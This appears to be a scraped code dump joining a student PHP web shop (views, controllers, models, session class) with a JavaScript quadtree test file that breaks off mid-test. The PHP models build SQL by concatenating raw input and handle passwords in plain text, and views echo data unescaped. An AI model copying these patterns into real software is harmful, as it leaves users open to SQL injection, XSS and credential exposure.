<form action="/parduotuve/profile" method="post">
<div class="row border-bottom my-1 py-1">
<h4 class="my-auto mr-3 col-3">Username:</h4>
<h5 class="my-auto text-muted col-8"><?php echo $_SESSION['user_info']['username'] ?></h5>
</div>
<div class="row border-bottom my-1 py-1">
<div class="my-auto mr-3 col-3">Email: </div>
<input type="email" class="form-control col-8 my-auto" name="email" value="<?php echo $_SESSION['user_info']['email'] ?>" placeholder="Email">
</div>
<div class="row border-bottom my-1 py-1">
<div class="my-auto mr-3 col-3">Password: </div>
<input type="<PASSWORD>" class="form-control col-8 my-auto" name="password" placeholder="<PASSWORD>" required>
</div>
<div class="mt-3 pb-5">
<a href="/parduotuve/profile"><button type="button" class="btn btn-dark float-left">Go back</button></a>
<button type="submit" class="btn btn-primary float-right" name="edit_profile">Confirm</button>
</div>
</form>
</div>
</div><file_sep>/views/register/index.php
<div class="col-xl-5 col-lg-6 col-md-8 col-sm-12 mx-auto m-4">
<?php if (isset($this->data['errors']) && is_array($this->data['errors'])) { ?>
<?php foreach ($this->data['errors'] as $key => $error) { ?>
<div class="alert alert-danger" role="alert">
<?php echo $error; ?>
</div>
<?php } ?>
<?php } ?>
<h1 class="display-3 text-center mb-3">Register</h1>
<form action="register" method="post">
<div class="input-group my-2">
<div class="input-group-prepend">
<div class="input-group-text"><i class="fas fa-user"></i></div>
</div>
<input type="text" name="username" class="form-control" placeholder="Username" required>
</div>
<div class="input-group my-2">
<div class="input-group-prepend">
<div class="input-group-text"><i class="fas fa-envelope"></i></div>
</div>
<input type="email" name="email" class="form-control" placeholder="Email" required>
</div>
<div class="input-group my-2">
<div class="input-group-prepend">
<div class="input-group-text"><i class="fas fa-lock"></i></div>
</div>
<input type="<PASSWORD>" name="<PASSWORD>" class="form-control" placeholder="<PASSWORD>" required>
</div>
<div class="input-group my-2">
<div class="input-group-prepend">
<div class="input-group-text"><i class="fas fa-lock"></i></div>
</div>
<input type="<PASSWORD>" name="<PASSWORD>2" class="form-control" placeholder="<PASSWORD>" required>
</div>
<div class="form-check my-2 text-center">
<input type="checkbox" class="form-check-input" id="robot" required>
<label class="form-check-label" for="robot">I'm not a robot</label>
</div>
<button type="submit" class="btn btn-primary btn-block">Register</button>
</form>
<div class="text-center mt-3">
<a href="/parduotuve/login">Already have account?</a>
</div>
</div><file_sep>/views/catalog/index.php
<div class="row m-0">
<aside class="col-md-3 border-left border-right mb-1">
<?php include_once 'views/menu_categories.php'; ?>
</aside>
<div class="col-md-9 col-sm-12 row p-0 m-0 d-flex justify-content-start">
<?php if (isset($this->data['categories']) && count($this->data['categories']) > 0) { ?>
<?php foreach ($this->data['categories'] as $key => $category) { ?>
<div class="card col-lg-4 col-md-6 col-sm-12 p-0 my-1">
<a href="/parduotuve/catalog/<?php echo mb_strtolower($category['id']); ?>">
<img src="/parduotuve/img/<?php echo isset($category['image']) ? ('categories/' . $category['image']) : 'no-image.png'; ?>" class="card-img-top p-4" alt="">
</a>
<div class="card-body">
<h5 class="card-title text-center"><a href="/parduotuve/catalog/<?php echo $category['id']; ?>"><?php echo $category['name']; ?></a></h5>
</div>
</div>
<?php } ?>
<?php } else { ?>
<h3 class="mx-auto my-5">There are no catalogs</h3>
<?php } ?>
</div>
</div><file_sep>/views/cart/index.php
<div>
<div class="col-xl-10 col-lg-8 col-md-10 col-sm-12 mx-auto mt-3 mb-5">
<?php if (isset($this->data['errors']) && is_array($this->data['errors'])) { ?>
<?php foreach ($this->data['errors'] as $key => $error) { ?>
<div class="alert alert-danger col-xl-6 col-lg-8 col-md-10 col-sm-10 mx-auto text-center" role="alert">
<?php echo $error; ?>
</div>
<?php } ?>
<?php } elseif (isset($this->data['info']) && is_array($this->data['info'])) {?>
<?php foreach ($this->data['info'] as $key => $info) { ?>
<div class="alert alert-success col-xl-6 col-lg-8 col-md-10 col-sm-10 mx-auto text-center" role="alert">
<?php echo $info; ?>
</div>
<?php } ?>
<?php } ?>
<?php if(isset($this->data['products']) && is_array($this->data['products']) && count($this->data['products']) > 0) { ?>
<h1 class="text-center mt-3">Cart</h1>
<ul class="list-group">
<?php foreach ($this->data['products'] as $key => $product) { ?>
<li class="list-group-item mb-1"><a href="/parduotuve/product/<?php echo $product['id']; ?>"><?php echo $product['name']; ?></a> - $<?php echo $product['price']; ?> x <?php echo $product['amount']; ?> <form action="/parduotuve/cart" method="post" class="d-inline "><button type="submit" class="close" name="cart_remove" value="<?php echo $key; ?>"><span class="text-danger" aria-hidden="true">×</span></button></form></li>
<?php } ?>
</ul>
<div class="mt-2 text-center">
<h4>Total: $<?php echo array_sum(array_map(function ($item) { return $item['price'] * (($item['amount'] > 0) ? $item['amount'] : 1); }, $this->data['products'])); ?></h4>
</div>
<a href="/parduotuve/cart/continue"><button class="btn btn-block btn-primary">Continue</button></a>
<?php } else {?>
<div class="my-5">
<h2 class="text-center">Cart is empty</h2>
</div>
<?php } ?>
</div>
</div><file_sep>/controllers/admin.php
<?php
class Admin extends Controller {
function __construct($args = NULL) {
parent::__construct();
if ($this->session->isLogged() && $this->session->isAdmin()) {
if (isset($args[1])) {
switch ($args[1]) {
default:
$this->view->render('error/index');
break;
}
} else {
$this->view->render('admin/index');
}
} else {
$this->view->render('error/index');
}
}
}
<file_sep>/models/cartModel.php
<?php
class cartModel extends Model {
function __construct() {
parent::__construct();
}
function doesProductExist($product_id) {
$result = mysqli_query($this->db, "SELECT * FROM products WHERE id = '" . $product_id . "' LIMIT 1");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return TRUE;
} else {
return FALSE;
}
} else {
$this->handleError();
}
}
function getProduct($product_id) {
$result = mysqli_query($this->db, "SELECT * FROM products WHERE id = '" . $product_id . "' LIMIT 1");
if ($result) {
return mysqli_fetch_array($result, MYSQLI_ASSOC);
} else {
$this->handleError();
}
}
// Unused
function getUserCart($user_id) {
$result = mysqli_query($this->db, "SELECT products.id, products.name, products.price, user_cart_products.amount FROM user_cart_products LEFT JOIN products ON user_cart_products.product = products.id WHERE user = '" . $user_id . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return $this->resultToArray($result);
} else {
return FALSE;
}
} else {
$this->handleError();
}
}
function cartAddProduct($user_id, $product_id, $amount) {
$result = mysqli_query($this->db, "INSERT INTO user_cart_products (user, product, amount) VALUES ('" . $user_id . "', '" . $product_id . "', '" . $amount . "')");
if ($result) {
return TRUE;
} else {
$this->handleError();
}
}
function cartRemoveProduct($user_id, $product_id) {
$result = mysqli_query($this->db, "DELETE FROM user_cart_products WHERE user = '" . $user_id . "' AND product = '" . $product_id . "'");
if ($result) {
return TRUE;
} else {
$this->handleError();
}
}
}
<file_sep>/core/Session.php
<?php
class Session {
function __construct() {
session_start();
if (!isset($_SESSION['user_cart'])) {
$_SESSION['user_cart'] = array();
}
}
function isLogged() {
if (isset($_SESSION['isLogged']) && $_SESSION['isLogged'] === TRUE) {
return TRUE;
} else {
return FALSE;
}
}
function isAdmin() {
if (isset($_SESSION['isAdmin']) && $_SESSION['isAdmin'] === TRUE) {
return TRUE;
} else {
return FALSE;
}
}
function login($user_info) {
if (isset($user_info['id'])) {
$_SESSION['user_info'] = $user_info;
$_SESSION['isLogged'] = TRUE;
if (isset($user_info['admin'])) {
$_SESSION['isAdmin'] = $user_info['admin'] == 1 ? TRUE : FALSE;
} else {
$_SESSION['isAdmin'] = FALSE;
}
}
}
function getUserId() {
return $_SESSION['user_info']['id'];
}
function getUserName() {
return isset($_SESSION['user_info']['username']) ? $_SESSION['user_info']['username'] : '';
}
function getUserEmail() {
return isset($_SESSION['user_info']['email']) ? $_SESSION['user_info']['email'] : '';
}
function getUserRegisterDate() {
return isset($_SESSION['user_info']['register_date']) ? $_SESSION['user_info']['register_date'] : '';
}
function updateUserInfo($user_info) {
$_SESSION['user_info'] = $user_info;
}
function cartAddProduct($product, $amount) {
$product['amount'] = $amount;
array_push($_SESSION['user_cart'], $product);
}
function cartRemoveProduct($id) {
foreach ($_SESSION['user_cart'] as $key => $value) {
if ($key == $id) {
unset($_SESSION['user_cart'][$key]);
return TRUE;
}
}
return FALSE;
}
function getUserCart() {
return $_SESSION['user_cart'];
}
function logout() {
$_SESSION['isLogged'] = FALSE;
}
}
<file_sep>/models/profileModel.php
<?php
class profileModel extends Model {
function __construct() {
parent::__construct();
}
function updateUserInfo($user_id, $email) {
$result = mysqli_query($this->db, "UPDATE users SET email = '" . $email . "' WHERE id = '" . $user_id . "'");
if ($result) {
return TRUE;
} else {
return mysqli_error($this->db);
}
}
function updateUserPassword($user_id, $password) {
$result = mysqli_query($this->db, "UPDATE users SET password = '" . $password . "' WHERE id = '" . $user_id . "'");
if ($result) {
return TRUE;
} else {
return mysqli_error($this->db);
}
}
function isPasswordCorrect($user_id, $password) {
$result = mysqli_query($this->db, "SELECT * FROM users WHERE id = '" . $user_id . "' AND password = '" . $password . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return TRUE;
} else {
return FALSE;
}
} else {
return mysqli_error($this->db);
}
}
}
<file_sep>/views/blog/post.php
<h1 class="text-center py-2">Post</h1>
<div class="position-relative col-xl-5 col-lg-6 col-md-8 col-sm-11 mx-auto pb-4 mb-5 shadow">
<form action="/parduotuve/blog/post/<?php echo isset($this->data['forum_id']) ? $this->data['forum_id'] : ''; ?>" method="post">
<div class="form-group mt-3">
<input type="text" name="post_name" class="form-control" placeholder="Name" required>
</div>
<div class="form-group">
<textarea name="post_content" class="form-control" placeholder="Message" required></textarea>
</div>
<div class="form-group text-center pb-1">
<button class="btn btn-sm btn-primary position-absolute forum-post">Post →</button>
</div>
</form>
<a href="/parduotuve/blog/<?php echo isset($this->data['forum_id']) ? $this->data['forum_id'] : ''; ?>" class="position-absolute m-1 forum-back"><button type="button" class="btn btn-sm btn-dark">← Back</button></a>
</div><file_sep>/controllers/catalog.php
<?php
class Catalog extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (isset($args[1])) {
$this->view->addData("products", $this->model->getProducts($args[1]));
$this->view->render('catalog/products');
} else {
$this->view->addData("categories", $this->model->getCategories());
$this->view->render('catalog/index');
}
}
}
<file_sep>/core/core.php
<?php
class Core {
// Default controller
protected $controller = 'index';
function __construct() {
// Preparing URL
$url = $this->parseUrl();
// Checking if URL supplied
if ($url) {
// Checking if controller file exists
if (file_exists('controllers/' . $url[0] . '.php')) {
// Setting current controller to requested
$this->controller = $url[0];
//unset($url[0]); // REMOVE ?
} else {
$this->controller = 'errno';
}
}
// Including controller class file
require_once 'controllers/' . $this->controller . '.php';
// Checking if controller class exists
if (class_exists($this->controller)) {
// Instantiating new controller class
$this->controller = new $this->controller($url);
} else {
print 'GG: Controller class - ' . $this->controller . ', not found!';
}
}
function parseUrl() {
if (filter_has_var(INPUT_GET, 'url')) {
return explode('/', filter_var(rtrim($_GET['url'], '/'), FILTER_SANITIZE_STRING));
}
}
}
<file_sep>/core/view.php
<?php
class View {
protected $session;
protected $page;
private $data;
function __construct($session) {
$this->session = $session;
}
public function addData($key, $data) {
$this->data[$key] = $data;
}
public function render($name, $data = NULL) {
$this->page = explode("/", $name)[0];
require_once './views/head.php';
require_once './views/' . $name . '.php';
require_once './views/foot.php';
}
}
<file_sep>/views/head.php
<!DOCTYPE html>
<html lang="en">
<head>
<!-- Defaults -->
<meta charset="UTF-8">
<title>Shop</title>
<meta name="description" content="...">
<meta name="author" content="<NAME>">
<link rel="icon" href="/parduotuve/img/favicon.ico">
<!-- Mobile -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- CSS -->
<link href="https://fonts.googleapis.com/css?family=Baloo+Chettan" rel="stylesheet">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="<KEY>" crossorigin="anonymous">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.1/css/all.css" integrity="<KEY>" crossorigin="anonymous">
<link rel="stylesheet" href="/parduotuve/style.css">
</head>
<body>
<div class="container p-0">
<!-- Header BEGIN -->
<header class="shadow">
<div class="header-top">
<nav class="navbar navbar-expand-lg navbar-dark">
<a class="navbar-brand" href="#">LOGO</a>
<div class="ml-auto">
<?php if ($this->session->isLogged()) { ?>
<?php echo $this->session->isAdmin() ? '<a href="/parduotuve/admin"><button type="button" class="btn btn-light"><i class="fas fa-user-shield"></i> Admin</button></a>' : ''; ?>
<a href="/parduotuve/profile"><button type="button" class="btn btn-light"><i class="fas fa-user"></i> Profile</button></a>
<a href="/parduotuve/logout"><button type="button" class="btn btn-light"><i class="fas fa-sign-out-alt"></i> Logout</button></a>
<?php } else { ?>
<a href="/parduotuve/login"><button type="button" class="btn btn-light"><i class="fas fa-sign-in-alt"></i> Login</button></a>
<a href="/parduotuve/register"><button type="button" class="btn btn-light"><i class="fas fa-user-plus"></i> Register</button></a>
<?php } ?>
</div>
</nav>
</div>
<div class="header-middle">
<div id="header" class="carousel slide" data-ride="carousel">
<ol class="carousel-indicators">
<li data-target="#header" data-slide-to="0" class="active"></li>
<li data-target="#header" data-slide-to="1"></li>
<li data-target="#header" data-slide-to="2"></li>
</ol>
<div class="carousel-inner">
<div class="carousel-item active">
<img src="/parduotuve/img/header1.jpg" class="d-block w-100" alt="...">
<div class="carousel-caption d-none d-md-block">
<h5 class="text-shadow-1">Model S | Tesla</h5>
</div>
</div>
<div class="carousel-item">
<img src="/parduotuve/img/header2.jpg" class="d-block w-100" alt="...">
<div class="carousel-caption d-none d-md-block">
<h5>-75% off!</h5>
</div>
</div>
<div class="carousel-item">
<img src="/parduotuve/img/header3.jpg" class="d-block w-100" alt="...">
<div class="carousel-caption d-none d-md-block">
<h5>...</h5>
<p>...</p>
</div>
</div>
</div>
<a class="carousel-control-prev" href="#header" role="button" data-slide="prev">
<span class="carousel-control-prev-icon" aria-hidden="true"></span>
<span class="sr-only">Previous</span>
</a>
<a class="carousel-control-next" href="#header" role="button" data-slide="next">
<span class="carousel-control-next-icon" aria-hidden="true"></span>
<span class="sr-only">Next</span>
</a>
</div>
</div>
<div class="header-bottom my-2">
<ul class="nav nav-tabs">
<?php $menu = array("Home" => "", "Catalog" => isset($this->data['categories']) ? $this->data['categories'] : array(), "Blog" => "blog", "About" => "about"); ?>
<?php foreach ($menu as $key => $value) { ?>
<?php if(is_array($menu[$key])) { ?>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" data-toggle="dropdown" href="#" role="button" aria-haspopup="true" aria-expanded="false"><?php echo $key ?></a>
<div class="dropdown-menu">
<?php foreach ($menu[$key] as $subkey => $submenu) { ?>
<a class="dropdown-item" href="/parduotuve/<?php echo strtolower($key) . "/" . $submenu['id']; ?>"><?php echo $submenu["name"]; ?></a>
<?php } ?>
<div class="dropdown-divider"></div>
<a class="dropdown-item" href="/parduotuve/<?php echo strtolower($key); ?>"><?php echo $key;?></a>
</div>
</li>
<?php } else { ?>
<li class="nav-item">
<a class="nav-link<?php echo $this->page == $value ? " active" : ""; ?>" href="/parduotuve/<?php echo $value; ?>"><?php echo $key; ?></a>
</li>
<?php } ?>
<?php } ?>
<div class="ml-auto mx-3 d-flex">
<a href="/parduotuve/cart" class="m-auto"><i class="fas fa-shopping-cart">Cart (<?php echo is_array($this->session->getUserCart()) ? count($this->session->getUserCart()) : '0'; ?>)</i></a>
</div>
</ul>
</div>
</header>
<!-- Header END -->
<!-- Main BEGIN -->
<main class="container p-0">
|
3b055e5f3afa179cfe4f55b7ff80306b92624abd
|
[
"SQL",
"Text",
"PHP"
] | 39
|
PHP
|
Icybrew/Parduotuve
|
55c9d21f2215ce45071626c8160c21944385400a
|
e3c13118c80b28470acddadecc729a96ab90d6df
|
refs/heads/master
|
<file_sep>import { Component, OnInit } from "@angular/core";
import { HttpErrorResponse } from "@angular/common/http";
import { studentCService } from "../services/student.service";
import { FormGroup, FormBuilder, FormControl} from "@angular/forms";
import { Validators} from "@angular/forms";
@Component({
selector:"student",
templateUrl:"student.component.html"
})
export class studentComponent implements OnInit{
private result:any;
private studentSubscribe:any;
userData:FormGroup;
constructor(private _service:studentCService, private _formBuilder:FormBuilder){}
ngOnInit(){
this.userData=this._formBuilder.group({
studentId:[null,[Validators.required]],
studentName:['madhurajuBujji',[Validators.required]]
})
}
public register():any{
console.log(this.userData)
this.studentSubscribe=this._service.postEmp(this.userData.value).subscribe(this._successCallBack, this._errorCallBack);
};
public _successCallBack=(res):any=>{
this.result=res;
};
public _errorCallBack=(err:HttpErrorResponse):any=>{
if(err.error instanceof Error){
console.log("client side errors");
}else{
console.log("server side errors.....!!");
}
};
};<file_sep>import { Injectable } from "@angular/core";
import { HttpClient } from "@angular/common/http";
@Injectable()
export class studentCService{
constructor(private _http:HttpClient){};
public postEmp(studentData:any):any{
return this._http.post("http://localhost:8080/addStudentDetails/student",studentData);
};
};
|
6cfa66c839d4e374bbb643aaec8c53e047814e12
|
[
"TypeScript"
] | 2
|
TypeScript
|
mailforrajus/AngularHttpPost
|
4b1c7b72c5fcba93bc42b4a251304f2f4f20728c
|
fbc90647335ef8b5e81021140ff0dcb49425508b
|
refs/heads/master
|
<repo_name>DanielW1987/sfg-pet-clinic<file_sep>/pet-clinic-data/src/main/java/guru/springframework/sfgpetclinic/services/jpa/VetJpaService.java
package guru.springframework.sfgpetclinic.services.jpa;
import guru.springframework.sfgpetclinic.model.Vet;
import guru.springframework.sfgpetclinic.repositories.VetRepository;
import guru.springframework.sfgpetclinic.services.VetService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Profile;
import org.springframework.stereotype.Service;
import java.util.Optional;
@Service
@Profile("spring-data-jpa")
public class VetJpaService implements VetService {
private final VetRepository vetRepository;
@Autowired
public VetJpaService(VetRepository vetRepository) {
this.vetRepository = vetRepository;
}
@Override
public long count() {
return vetRepository.count();
}
@Override
public Optional<Vet> findById(Long id) {
return vetRepository.findById(id);
}
@Override
public Vet save(Vet vet) {
return vetRepository.save(vet);
}
@Override
public Iterable<Vet> findAll() {
return vetRepository.findAll();
}
@Override
public void delete(Vet vet) {
vetRepository.delete(vet);
}
@Override
public void deleteById(Long id) {
vetRepository.deleteById(id);
}
}
<file_sep>/pet-clinic-data/src/test/java/guru/springframework/sfgpetclinic/services/map/OwnerMapServiceTest.java
package guru.springframework.sfgpetclinic.services.map;
import guru.springframework.sfgpetclinic.model.Owner;
import guru.springframework.sfgpetclinic.services.OwnerService;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import java.util.Iterator;
import java.util.Optional;
import static org.junit.jupiter.api.Assertions.*;
/**
* User: DanielW
* Date: 19.08.2019
* Time: 07:39
*/
class OwnerMapServiceTest {
private OwnerService ownerService;
private final String lastName = "Smith";
private final Long ownerId = 1L;
@BeforeEach
void setup() {
ownerService = new OwnerMapService(new PetTypeMapService(), new PetMapService());
ownerService.save(Owner.builder().id(ownerId).lastName(lastName).build());
}
@Test
void findAll() {
Iterable<Owner> owners = ownerService.findAll();
Iterator<Owner> iterator = owners.iterator();
Owner owner = iterator.next();
assertFalse(iterator.hasNext());
assertEquals(ownerId, owner.getId());
}
@Test
void findById() {
Optional<Owner> owner = ownerService.findById(ownerId);
assertTrue(owner.isPresent());
assertEquals(ownerId, owner.get().getId());
}
@Test
void findByLastName() {
Optional<Owner> smith = ownerService.findByLastName(lastName);
assertTrue(smith.isPresent());
assertEquals(ownerId, smith.get().getId());
}
@Test
void findByLastNameNotFound() {
Optional<Owner> optionalOwner = ownerService.findByLastName("Foo");
assertTrue(optionalOwner.isEmpty());
}
@Test
void saveWithExistingId() {
Long newId = 2L;
Owner owner2 = Owner.builder().id(newId).build();
Owner savedOwner = ownerService.save(owner2);
assertEquals(newId, savedOwner.getId());
}
@Test
void saveWithoutId() {
Owner owner2 = Owner.builder().build();
Owner savedOwner = ownerService.save(owner2);
assertNotNull(savedOwner);
assertNotNull(savedOwner.getId());
}
@Test
void delete() {
ownerService.delete(ownerService.findById(ownerId).get());
assertEquals(0, ownerService.count());
}
@Test
void deleteById() {
ownerService.deleteById(ownerId);
assertEquals(0, ownerService.count());
}
}
<file_sep>/pet-clinic-data/src/main/java/guru/springframework/sfgpetclinic/services/map/OwnerMapService.java
package guru.springframework.sfgpetclinic.services.map;
import guru.springframework.sfgpetclinic.model.Owner;
import guru.springframework.sfgpetclinic.model.Pet;
import guru.springframework.sfgpetclinic.services.OwnerService;
import guru.springframework.sfgpetclinic.services.PetService;
import guru.springframework.sfgpetclinic.services.PetTypeService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Profile;
import org.springframework.lang.NonNull;
import org.springframework.stereotype.Service;
import java.util.Optional;
import java.util.Set;
@Service
@Profile({"default", "map"})
public class OwnerMapService extends AbstractMapService<Owner, Long> implements OwnerService {
private final PetTypeService petTypeService;
private final PetService petService;
@Autowired
public OwnerMapService(PetTypeService petTypeService, PetService petService) {
this.petTypeService = petTypeService;
this.petService = petService;
}
@Override
public Optional<Owner> findByLastName(String lastName) {
for (var owner : findAll()) {
if (owner.getLastName().equalsIgnoreCase(lastName)) {
return Optional.of(owner);
}
}
return Optional.empty();
}
@Override
public Owner save(@NonNull Owner owner) {
Set<Pet> pets = owner.getPets();
if (pets != null && ! pets.isEmpty()) {
savePet(pets);
savePetType(pets);
}
return super.save(owner);
}
private void savePet(Set<Pet> pets) {
pets.forEach(pet -> {
if (pet.isNew()) {
petService.save(pet);
}
});
}
private void savePetType(Set<Pet> pets) {
for (Pet pet : pets) {
if (pet.getPetType() != null && pet.getPetType().isNew()) {
petTypeService.save(pet.getPetType());
}
}
}
}
<file_sep>/pet-clinic-data/src/main/java/guru/springframework/sfgpetclinic/services/jpa/OwnerJpaService.java
package guru.springframework.sfgpetclinic.services.jpa;
import guru.springframework.sfgpetclinic.model.Owner;
import guru.springframework.sfgpetclinic.repositories.OwnerRepository;
import guru.springframework.sfgpetclinic.services.OwnerService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Profile;
import org.springframework.stereotype.Service;
import java.util.Optional;
@Service
@Profile("spring-data-jpa")
public class OwnerJpaService implements OwnerService {
private final OwnerRepository ownerRepository;
@Autowired
public OwnerJpaService(OwnerRepository ownerRepository) {
this.ownerRepository = ownerRepository;
}
@Override
public long count() {
return ownerRepository.count();
}
@Override
public Optional<Owner> findByLastName(String lastName) {
return ownerRepository.findByLastName(lastName);
}
@Override
public Optional<Owner> findById(Long id) {
return ownerRepository.findById(id);
}
@Override
public Owner save(Owner owner) {
return ownerRepository.save(owner);
}
@Override
public Iterable<Owner> findAll() {
return ownerRepository.findAll();
}
@Override
public void delete(Owner owner) {
ownerRepository.delete(owner);
}
@Override
public void deleteById(Long id) {
ownerRepository.deleteById(id);
}
}
<file_sep>/pet-clinic-data/src/main/java/guru/springframework/sfgpetclinic/model/Pet.java
package guru.springframework.sfgpetclinic.model;
import lombok.AllArgsConstructor;
import lombok.Builder;
import lombok.Data;
import lombok.EqualsAndHashCode;
import javax.persistence.*;
import java.time.LocalDate;
import java.util.HashSet;
import java.util.Set;
@Entity
@Table(name = "pets")
@Data
@Builder
@AllArgsConstructor
@EqualsAndHashCode(callSuper = true, exclude = "owner")
public class Pet extends BaseEntity {
@Column(name = "name")
private String name;
@ManyToOne
@JoinColumn(name = "type_id")
private PetType petType;
@ManyToOne
@JoinColumn(name = "owner_id")
private Owner owner;
@Column(name = "birth_date")
private LocalDate birthDate;
@OneToMany(cascade = CascadeType.ALL, mappedBy = "pet")
private Set<Visit> visits;
public Pet() {
visits = new HashSet<>();
}
public void addVisit(Visit visit) {
visits.add(visit);
}
}
|
3edea766b5a40cc9dd3eb7be32a4582c76259f9c
|
[
"Java"
] | 5
|
Java
|
DanielW1987/sfg-pet-clinic
|
2af11a7d4f56758d61e150394495b726b0d2b2e5
|
cc6bc095b29e1351f984c76c602e2a342c417a2f
|
refs/heads/master
|
<repo_name>F1LT3R/carlton-quadtree<file_sep>/leaf-tests.js
var test = require('./test-runner.js');
describe = test.describe;
expect = test.expect;
run = test.run;
var props = {
bounds: {
top: 0,
left: 0,
bottom: 1.001,
right: 1.001,
}
};
var Leaf = require('./Leaf.js');
describe('Leaf should require definition properties', function () {
var leaf = new Leaf();
expect(leaf.valid).toBe(false);
var leaf = new Leaf({});
expect(leaf.valid).toBe(false);
var leaf = new Leaf({ bounds: null });
expect(leaf.valid).toBe(false);
});
describe('Leaf should be undefined if no bounds dimensions are passed', function () {
var leaf = new Leaf({
bounds: {
// top: 0,
left: 0,
bottom: 1,
right: 1,
}
});
expect(leaf.valid).toBe(false);
var leaf = new Leaf({
bounds: {
top: 0,
// left: 0,
bottom: 1,
right: 1,
}
});
expect(leaf.valid).toBe(false);
var leaf = new Leaf({
bounds: {
top: 0,
left: 0,
// bottom: 1,
right: 1,
}
});
expect(leaf.valid).toBe(false);
var leaf = new Leaf({
bounds: {
top: 0,
left: 0,
bottom: 1,
// right: 1,
}
});
expect(leaf.valid).toBe(false);
});
describe('Leaf should instantiate if bounds have top, left, bottom, right dimensions', function () {
var leaf = new Leaf({
bounds: {
top: 0,
left: 0,
bottom: 1,
right: 1,
}
});
expect(typeof leaf).toBe('object');
expect(typeof leaf.bounds).toBe('object');
expect(typeof leaf.bounds.top).toBe('number');
expect(typeof leaf.bounds.left).toBe('number');
expect(typeof leaf.bounds.bottom).toBe('number');
expect(typeof leaf.bounds.right).toBe('number');
});
describe('New leaf should have no items and no leaves', function () {
var leaf = new Leaf(props);
expect(leaf.items.length).toBe(0);
expect(leaf.leaves.length).toBe(0);
});
describe('Adding an item should fail x, y, val/objectReference', function () {
var leaf = new Leaf(props);
leaf.addItem({});
expect(leaf.items.length).toBe(0);
var leaf = new Leaf(props);
leaf.addItem({
// x: 0,
y: 0,
val: 'A',
});
expect(leaf.items.length).toBe(0);
var leaf = new Leaf(props);
leaf.addItem({
x: 0,
// y: 0,
val: 'A',
});
expect(leaf.items.length).toBe(0);
var leaf = new Leaf(props);
leaf.addItem({
x: 0,
y: 0,
// val: 'A',
});
expect(leaf.items.length).toBe(0);
});
describe('Leaf should have 1 item after adding first item', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
expect(leaf.items.length).toBe(1);
});
describe('Leaf should have 2 items after adding second item', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
expect(leaf.items.length).toBe(2);
});
describe('Leaf should have 3 items after adding third item', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
expect(leaf.items.length).toBe(3);
});
describe('Leaf should have 4 items after adding forth item', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
expect(leaf.items.length).toBe(4);
});
describe('getItems should return 4 and 5 items respectively', function () {
var leaf = new Leaf(props);
// Add 4 items
for (var i=0; i< 4; i++) {
leaf.addItem({
x: Math.random(),
y: Math.random(),
val: i
});
}
// Check we have 4 items
expect(typeof leaf).toBe('object');
expect(leaf.getItems().length).toBe(4)
// Add one more item
leaf.addItem({
x: Math.random(),
y: Math.random(),
val: i
});
// check we have 5 items
expect(leaf.getItems().length).toBe(5)
});
describe('Leaf should count 16,384 items after adding 16,384 items', function () {
var leaf = new Leaf(props);
for (var i=0; i< 16384; i++) {
leaf.addItem({
x: Math.random(), // random from 0-1
y: Math.random(), // random from 0-1
val: i
});
}
expect(typeof leaf).toBe('object');
expect(leaf.getItems().length).toBe(16384)
}, 400);
describe('Item should have reference to leaf', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
var item = leaf.items[0];
expect(typeof item.leaf).toBe('object');
// Should see it's own reflection
console.log(item)
expect(item.leaf.items.length).toBe(1);
});
describe('Item\'s leaf reference should change when it\s leaf changes', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
leaf.addItem({ x: 0.125, y: 0.125, val: 'E' });
var item = leaf.leaves[0].items[0];
expect(typeof item.leaf).toBe('object');
// There shouldbe two items on this leaf
expect(item.leaf.items.length).toBe(2);
// The item itself should have no id
expect(typeof item.id).toBe('undefined');
// Check the the IDs on this leaf are the same
expect(item.leaf.id).toEqual(item.leaf.items[0].leaf.id);
expect(item.leaf.id).toEqual(item.leaf.items[1].leaf.id);
});
describe('getUnEmptyLeaves should return 4 leaves, each containing 1 item', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
var unEmptyLeaves = leaf.getUnEmptyLeaves();
expect(unEmptyLeaves.length).toEqual(1);
// Expect the only unempty lead to have 4 items
expect(unEmptyLeaves[0].items.length).toBe(4);
});
describe('getUnEmptyLeaves should return 4 leaves, each containing > 0 items', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
leaf.addItem({ x: 0.125, y: 0.125, val: 'E' });
var unEmptyLeaves = leaf.getUnEmptyLeaves();
expect(unEmptyLeaves.length).toEqual(4);
// Expect all the leaves to have more than 0 items
